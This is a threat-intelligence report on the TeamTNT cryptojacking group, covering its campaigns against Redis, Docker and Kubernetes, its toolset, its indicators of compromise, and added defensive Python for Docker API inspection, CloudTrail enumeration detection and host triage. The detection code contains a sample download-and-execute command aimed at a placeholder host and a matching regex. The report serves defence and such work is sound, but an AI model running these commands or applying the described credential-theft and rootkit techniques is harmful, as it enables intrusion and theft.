| Category | Industry | Region | Source |
| --- | --- | --- | --- |
| Adversary Intelligence | IT & Technology | Global | A2 |
- TeamTNT goes by the Twitter handle “@HildeTnT / [email protected]”
- During their attack period, the group was very active on Twitter, posting and discussing:
- Attacks conducted
- Servers compromised
- Tools employed
- The group most likely originates from Germany because:
- Most of the tweets and bash scripts are in the German language.
- The account’s location is set to Deutschland.
- Comments in the bash scripts contain words from the German language.
- A tweet made on the group’s official account suggests that it is a collective of 12 individuals (or more, if they hired new people in late 2020).
- TeamTNT’s GitHub profile contains 25 public repositories, most of which are forks of popular red-teaming tools and other repositories they possibly leveraged.
- The following domain was used by the group to host their malicious files and scripts while performing the attack: https://teamtnt[.]red.
- CloudSEK researchers were able to gather the following information about the domain:
- The domain was registered on 10 February 2020.
- At the same time, TeamTNT had begun to actively target Redis servers.
- The domain is currently inactive.
- Some screenshots of the domain are still available on Wayback Machine
- The group has been active since February 2020 when they launched their first campaign targeting Redis servers.
- The motive behind the attack was cryptojacking and the following tools were used:
- pnscan - An open-source parallel network scanner, used to scan the whole internet for services listening on the default Redis port (6379). The setup script generates the payload that is executed on the Redis servers.
- Tsunami - An open-source IRC botnet, also known as titan or ziggystartux, used to perform DDoS attacks against targets or to execute commands on the infected machine.
- xmrigCC - A fork of the XMRig Monero miner with a command-and-control server, used to mine cryptocurrency and manage the miners remotely.
- watchdog.c - A monitoring utility for Linux, used to watch over the mining process.
- Punk.py - A post-exploitation tool meant to help pivot through a network from a compromised Unix box. It collects usernames, SSH keys and known hosts from the Unix system and then tries to connect over SSH using every combination found.
- In May 2020, the group started targeting Docker by employing the same Bash scripts and malware.
- The group’s primary motive remained the same, i.e cryptojacking.
- A new tool was added to their arsenal:
- masscan - A TCP port scanner used to find misconfigured Docker services by scanning for exposed ports and services. Once a victim is located with masscan and zgrab, the attacker creates a container from the Alpine image and passes an argument to the container’s script, which downloads and executes further malicious scripts.
- The group continued their attacks on Docker however they started using the Ubuntu images directly instead of Alpine.
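The container-creation step described above (an exposed Docker API, a container started from a stock image, and a command that fetches and runs further scripts) is what a daemon-side gate should be looking at. The following Python is an added example, not CloudSEK’s, TeamTNT’s or Docker’s own code: it inspects a `POST /containers/create` JSON body the way an authorization plugin or API gateway would and reports the host-escape and download-and-execute indicators. The request bodies are constructed for the example, and the sensitive-path list and the regular expression are this example’s own assumptions.

```python
import json
import re

# Host paths a container created through an exposed API should never be allowed
# to bind-mount (this example's own list; extend it for your environment).
SENSITIVE_HOST_PATHS = ("/", "/etc", "/root", "/proc", "/sys", "/dev",
                        "/var/run/docker.sock", "/home")

# "fetch a script and pipe it into a shell": the download-and-execute pattern
# the report attributes to the argument passed to the container.
DOWNLOAD_AND_EXEC = re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(ba)?sh\b")


def _host_sources(host_config: dict) -> list:
    """Host-side source paths from both the legacy Binds list and the Mounts list."""
    sources = [b.split(":", 1)[0] for b in host_config.get("Binds") or []]
    for m in host_config.get("Mounts") or []:
        if m.get("Type", "bind") == "bind" and m.get("Source"):
            sources.append(m["Source"])
    return sources


def _is_sensitive(path: str) -> bool:
    if path == "/":
        return True
    return any(path == p or path.startswith(p.rstrip("/") + "/")
               for p in SENSITIVE_HOST_PATHS if p != "/")


def inspect_create_request(body: str) -> list:
    """Return findings for a Docker Engine API /containers/create JSON body.

    An empty list means none of the escape or download-and-execute indicators
    checked here are present; it does not mean the request is safe.
    """
    req = json.loads(body)
    host = req.get("HostConfig") or {}
    findings = []
    if host.get("Privileged"):
        findings.append("privileged container requested")
    if host.get("PidMode") == "host":
        findings.append("host PID namespace requested")
    if host.get("NetworkMode") == "host":
        findings.append("host network namespace requested")
    for src in _host_sources(host):
        if _is_sensitive(src):
            findings.append(f"sensitive host path mounted: {src}")
    argv = (req.get("Entrypoint") or []) + (req.get("Cmd") or [])
    if DOWNLOAD_AND_EXEC.search(" ".join(argv)):
        findings.append("command downloads and executes a remote script")
    return findings


# Constructed request bodies for demonstration (not captured traffic).
MALICIOUS_BODY = json.dumps({
    "Image": "alpine",
    "Cmd": ["sh", "-c", "wget -q -O - http://example.invalid/init.sh | sh"],
    "HostConfig": {"Binds": ["/:/host"], "PidMode": "host"},
})
BENIGN_BODY = json.dumps({
    "Image": "nginx:1.25",
    "Cmd": ["nginx", "-g", "daemon off;"],
    "HostConfig": {"Binds": ["/srv/www:/usr/share/nginx/html:ro"]},
})

if __name__ == "__main__":
    for label, body in (("malicious", MALICIOUS_BODY), ("benign", BENIGN_BODY)):
        print(label, inspect_create_request(body) or "no findings")
```

A check like this belongs behind the daemon, not instead of a fix: the misconfiguration the scanners find is a Docker API reachable over plain TCP, so the first remediation is to stop exposing it (or require mutually authenticated TLS) and only then gate what authenticated clients may create.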
- The group started using a Linux Kernel Module (LKM) rootkit named Diamorphine to hide their activities on infected machines.
- AWS credential-stealing capabilities were added into their scripts.
- TeamTNT started abusing Weave Scope, a legitimate cloud monitoring and troubleshooting tool, as a backdoor for the following:
- Gaining full access to the victim’s cloud environment
- Monitoring Docker, Kubernetes, the Distributed Cloud Operating System (DC/OS), and AWS Elastic Container Service (ECS)
- Running shell commands
- The group began using two new tools to steal credentials from browser history and network connections:
- The group also began using a simple Linux ELF runtime crypter, ezuri, to encrypt their malware for evading detection.
- Lacework Labs released a report on Tsunami (the bot used by TeamTNT) mentioning the following details:
- Of the 200 bots connected by the earlier scripts, only 90 were seen with unique IP addresses.
- Some of the bots behind a NAT service were sharing the same external IP address.
- The majority of the affected machines were Asian cloud instances, hosted primarily by Tencent, Alibaba, and AWS.
- During this period, the group stopped attacking Redis instances and started targeting Kubernetes.
- Three new tools were being employed by the group:
- Peirates - An open-source Kubernetes penetration-testing tool
- Botb (Break out the Box) - An open-source container analysis and exploitation tool used against Kubernetes environments
- libprocesshider - An open-source tool that uses the dynamic linker’s preload mechanism (LD_PRELOAD via /etc/ld.so.preload) to hide a process on Linux.
- The group’s target list remained the same, but they expanded their credential-stealing capabilities to the following services and applications.
- They added the AWS CLI to their script to exfiltrate as much information as possible about the instance, including resources, instance metadata, roles, volumes, etc.
- On 25 July 2021, TeamTNT launched a campaign named “Chimaera” where they continued their attacks on Docker, Kubernetes, and Weavescope services.
- To maintain transparency, the group created a dashboard on their website that displayed campaign statistics.
- The group significantly improved their enumeration technique by adding over 70 unique AWS CLI commands designed to enumerate the following 7 AWS services:
- IAM configuration
- EC2 instances
- S3 buckets
- Support cases
- Direct Connect
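The enumeration described above (dozens of AWS CLI commands against IAM, EC2, S3, Support and Direct Connect) is visible to the account owner in CloudTrail as a dense run of Describe/List/Get calls from a single principal, usually the instance’s role. The following Python is an added example, not CloudSEK’s or TeamTNT’s code: it scores CloudTrail-style records for such bursts and generalises past the five services listed to any read-only call family. The records, principal ARNs, window and threshold are constructed assumptions for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Read-only call families an enumeration script leans on (this example's own list).
READ_ONLY_PREFIXES = ("Describe", "List", "Get")


def _event_time(record: dict) -> datetime:
    return datetime.strptime(record["eventTime"], "%Y-%m-%dT%H:%M:%SZ")


def find_enumeration_bursts(records, window=timedelta(minutes=10), min_distinct=20) -> dict:
    """Return {principal ARN: (distinct read-only calls, services touched)} for every
    principal that issues at least `min_distinct` different read-only API calls
    within any `window`-long stretch. Write calls are ignored on purpose: the
    enumeration phase the report describes is almost entirely Describe/List/Get."""
    by_principal = defaultdict(list)
    for r in records:
        if not r["eventName"].startswith(READ_ONLY_PREFIXES):
            continue
        arn = r.get("userIdentity", {}).get("arn", "unknown")
        by_principal[arn].append((_event_time(r), r["eventSource"], r["eventName"]))

    bursts = {}
    for arn, calls in by_principal.items():
        calls.sort()
        best_count, best_services = 0, set()
        lo = 0
        for hi in range(len(calls)):          # sliding window over event time
            while calls[hi][0] - calls[lo][0] > window:
                lo += 1
            in_window = calls[lo:hi + 1]
            distinct = {(src, name) for _, src, name in in_window}
            if len(distinct) > best_count:
                best_count = len(distinct)
                best_services = {src for _, src, _ in in_window}
        if best_count >= min_distinct:
            bursts[arn] = (best_count, sorted(best_services))
    return bursts


# Constructed principals (not real account data).
ROLE_ARN = "arn:aws:sts::123456789012:assumed-role/web-instance-role/i-0abc123"
USER_ARN = "arn:aws:iam::123456789012:user/alice"


def sample_records() -> list:
    """Constructed CloudTrail-style records, not real log data: 21 distinct
    read-only calls from an instance role in under four minutes, plus an
    administrator doing ordinary work."""
    enum_calls = [
        ("iam.amazonaws.com", n) for n in ("ListUsers", "ListRoles", "ListPolicies", "ListGroups",
                                           "GetAccountSummary", "ListAccessKeys", "GetUser")
    ] + [
        ("ec2.amazonaws.com", n) for n in ("DescribeInstances", "DescribeVolumes", "DescribeSecurityGroups",
                                           "DescribeSnapshots", "DescribeKeyPairs", "DescribeVpcs", "DescribeImages")
    ] + [
        ("s3.amazonaws.com", n) for n in ("ListBuckets", "GetBucketPolicy", "GetBucketAcl", "GetBucketLocation")
    ] + [("support.amazonaws.com", "DescribeCases"),
         ("directconnect.amazonaws.com", "DescribeConnections"),
         ("sts.amazonaws.com", "GetCallerIdentity")]
    start = datetime(2021, 7, 25, 10, 0, 0)
    fmt = "%Y-%m-%dT%H:%M:%SZ"
    records = [
        {"eventTime": (start + timedelta(seconds=10 * i)).strftime(fmt),
         "eventSource": src, "eventName": name, "userIdentity": {"arn": ROLE_ARN}}
        for i, (src, name) in enumerate(enum_calls)
    ]
    for i, (src, name) in enumerate([("ec2.amazonaws.com", "DescribeInstances"),
                                     ("ec2.amazonaws.com", "RunInstances"),
                                     ("s3.amazonaws.com", "ListBuckets")]):
        records.append({"eventTime": (start + timedelta(minutes=25 * i)).strftime(fmt),
                        "eventSource": src, "eventName": name, "userIdentity": {"arn": USER_ARN}})
    return records


if __name__ == "__main__":
    for arn, (count, services) in find_enumeration_bursts(sample_records()).items():
        print(f"{arn}: {count} distinct read-only calls across {', '.join(services)}")
```

Tune `min_distinct` against a baseline of your own automation first: inventory and compliance scanners also issue dense read-only bursts, so the useful signal is a burst from an instance role that normally makes a handful of calls, not the burst on its own.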
- They also started employing LaZagne, another open-source application, to enhance their credential-stealing capabilities.
- Account manipulation by adding their own SSH authorized_keys on compromised servers.
- Installing a scanner to scan the entire internal network for lateral movements.
- Using process monitoring tools to restart processes.
- Using scripts to install all sorts of tools, malware, and miners.
- Packing binaries to evade normal security checks.
- Using obfuscation and encodings in bash scripts and while communicating through C2 servers.
- Using kernel-level rootkits to hide their processes.
- Deploying their own containers for attacks and mining.
- Stealing cloud service credentials from compromised hosts.
- Resource hijacking and deploying XMRig Docker images to mine cryptocurrency.
| Category | Tools & Exploits |
| --- | --- |
| Scanners | pnscan, masscan, zgrab |
| Packers and crypters | Ezuri, UPX |
| Bots, miners, rootkits and tunnelling | Tsunami (IRC bot malware), xmrigCC, Diamorphine, libprocesshider, rathole |
| Credential stealers | Punk.py, LaZagne, Mimipy, MimiPenguin |
| Exploitation | Mostly custom scripts to compromise services such as Redis, Kubernetes and Docker; Peirates, Botb, Docker Escape Tool (CVE-2019-5736) |

| File | SHA256 |
| --- | --- |
| init.sh (the second script) | 5c488d9d6820f859cde5fb5d147cfe584a603152653d12e720b897df60c6f810 |
| Type | Domain / IPv4 / other indicators |
| --- | --- |
| C2 | 80.211.206[.]105, 164.68.106[.]96, 62.234.121[.]105 |
| Hosting malicious scripts and binaries | 85.214.149[.]236, 45.9.148[.]108, 5.9.148[.]35 |
| Domain / email | teamtnt[.]red, chimaera[.]cc, [email protected][.]red |
| Wallet | 88ZrgnVZ687Wg8ipWyapjCVRWL8yFMRaBDrxtiPSwAQrNz5ZJBRozBSJrCYffurn1Qg7Jn7WpRQSAA3C8aidaeadAn4xi4k |
| Wallet | 84dg9MjSkFvXkqHQuBr6ep6TfhR3pTP8DRyTMN5s8RgYMVRcnce7Day8edLkk3TqAaSHXu2N4W3A3XjKMaSx4X8Q3KQgZnh |
| Wallet | 46EPFzvnX5GH61ejkPpNcRNm8kVjs8oHS9VwCkKRCrJX27XEW2y1NPLfSa54DGHxqnKfzDUVW1jzBfekk3hrCVCmAUrFd3H |
| ssh-rsa (key) | AAAAB3NzaC1yc2EAAAADAQABAAABAQDIzB9hz7bNT6qtQKCMcitaaxEB9RyJEZuumE+gUMrh6hg3ccSMg9qnAlS/Lmw5SwwLJQXMB5WuhclPJsVawuP+pfsm1ZiGF2JnczEW5kBw1o5Fl/6WOV1p9MOaXHAbpi7o/5Zauu3lTktyIWuP5R9l/2pUWcFZInnaiOr1KNtCBPisNYbZ4FWAQVGwXzUWZ/ZE7SYIoOUm3EJihPPiTulegUmIzc7TzrnEn9M3U8K+LVFye+wDeSC3WNYwfjGQJA4aFsANOiz89olh77G7IaDR8LghNfVVkRjaJ6onDZwb2CZWSivkFsdYtL6690S407eqoes7wkJudo9Qxsn9wxNv |
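The host-level TTPs listed earlier (added authorized_keys entries, libprocesshider via the preload mechanism, the Diamorphine rootkit, connections to C2 and hosting infrastructure) and the indicators in the tables above can be checked on a suspect Linux host with a small triage script. The following Python is an added example, not CloudSEK’s or TeamTNT’s code: it refangs the indicators, embeds the SSH key body from the table, and runs four checks over artifact text. It assumes the artifacts are supplied as the contents of `~/.ssh/authorized_keys`, `/etc/ld.so.preload`, and the output of `lsmod` and `ss -ntp`; the sample artifacts are constructed for the example.

```python
def refang(ioc: str) -> str:
    """Turn a defanged indicator such as 80.211.206[.]105 back into a matchable form."""
    return ioc.replace("[.]", ".")


# Network indicators from the table above, stored defanged and refanged on use.
NETWORK_IOCS = {refang(x) for x in (
    "80.211.206[.]105", "164.68.106[.]96", "62.234.121[.]105",   # C2
    "85.214.149[.]236", "45.9.148[.]108", "5.9.148[.]35",         # script/binary hosting
)}

# Public key body from the table above, which the group drops into authorized_keys.
TEAMTNT_KEY = (
    "AAAAB3NzaC1yc2EAAAADAQABAAABAQDIzB9hz7bNT6qtQK"
    "CMcitaaxEB9RyJEZuumE+gUMrh6hg3ccSMg9qnAlS/Lmw5Sw"
    "wLJQXMB5WuhclPJsVawuP+pfsm1ZiGF2JnczEW5kBw1o5Fl/"
    "6WOV1p9MOaXHAbpi7o/5Zauu3lTktyIWuP5R9l/2pUWcFZInn"
    "aiOr1KNtCBPisNYbZ4FWAQVGwXzUWZ/ZE7SYIoOUm3EJihP"
    "PiTulegUmIzc7TzrnEn9M3U8K+LVFye+wDeSC3WNYwfjGQJA"
    "4aFsANOiz89olh77G7IaDR8LghNfVVkRjaJ6onDZwb2CZWSiv"
    "kFsdYtL6690S407eqoes7wkJudo9Qxsn9wxNv"
)


def check_authorized_keys(text: str) -> list:
    """Flag the known key body in an authorized_keys file (account manipulation)."""
    out = []
    for n, line in enumerate(text.splitlines(), 1):
        parts = line.split()
        if len(parts) >= 2 and parts[0].startswith("ssh-") and parts[1] == TEAMTNT_KEY:
            out.append(f"authorized_keys line {n}: known TeamTNT public key")
    return out


def check_ld_preload(text: str) -> list:
    """Any entry in /etc/ld.so.preload deserves a look; libprocesshider installs one."""
    out = []
    for path in (l.strip() for l in text.splitlines()):
        if not path or path.startswith("#"):
            continue
        tag = "process-hiding library" if "processhider" in path.lower() else "preloaded library"
        out.append(f"/etc/ld.so.preload: {tag} {path}")
    return out


def check_lsmod(text: str) -> list:
    """Look for the Diamorphine LKM rootkit by module name in lsmod output."""
    return [f"lsmod: rootkit module loaded: {line.split()[0]}"
            for line in text.splitlines()
            if line.split() and line.split()[0].lower() == "diamorphine"]


def check_connections(text: str) -> list:
    """Match peer addresses in `ss -ntp` style output against the indicator set."""
    out = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 5 or parts[0] == "State":
            continue
        peer_ip = parts[4].rsplit(":", 1)[0]
        if peer_ip in NETWORK_IOCS:
            out.append(f"connection to known TeamTNT infrastructure: {parts[4]}")
    return out


def triage(artifacts: dict) -> list:
    """Run every check over a dict of collected artifact texts and return all findings."""
    return (check_authorized_keys(artifacts.get("authorized_keys", ""))
            + check_ld_preload(artifacts.get("ld_so_preload", ""))
            + check_lsmod(artifacts.get("lsmod", ""))
            + check_connections(artifacts.get("ss", "")))


# Constructed artifacts standing in for files and command output from a host.
SAMPLE = {
    "authorized_keys": "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEXAMPLEKEYNOTREAL admin@bastion\n"
                       "ssh-rsa " + TEAMTNT_KEY + " root@localhost\n",
    "ld_so_preload": "/usr/local/lib/libprocesshider.so\n",
    "lsmod": "Module                  Size  Used by\n"
             "diamorphine            16384  0\n"
             "xt_conntrack           16384  1\n",
    "ss": "State Recv-Q Send-Q Local Address:Port Peer Address:Port Process\n"
          "ESTAB 0 0 10.0.0.5:51234 80.211.206.105:6667 users:((\"tsunami\",pid=4242,fd=3))\n"
          "ESTAB 0 0 10.0.0.5:22 10.0.0.9:50112 users:((\"sshd\",pid=901,fd=4))\n",
}

if __name__ == "__main__":
    for finding in triage(SAMPLE):
        print(finding)
```

Two caveats apply when reading the output. A loaded LKM rootkit can unlink itself from the module list, so a clean `lsmod` is one signal rather than proof of absence, and a preload library hides processes from `ps` and `ss` on the infected host itself; collect these artifacts from a trusted tool chain or from outside the host (a rescue environment, or flow logs for the connection check) rather than from the possibly compromised userland.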
- * Intelligence source and information reliability (Wikipedia)
- # Traffic Light Protocol (Wikipedia)
- TeamTNT Cryptomining Explosion 🧨 (Intezer)
- TeamTNT Builds Botnet from Chinese Cloud Servers (Lacework)
- Cetus: Cryptojacking Worm Targeting Docker Daemons (Palo Alto Networks Unit 42)
- Team TNT – The First Crypto-Mining Worm to Steal AWS Credentials (Cado Security)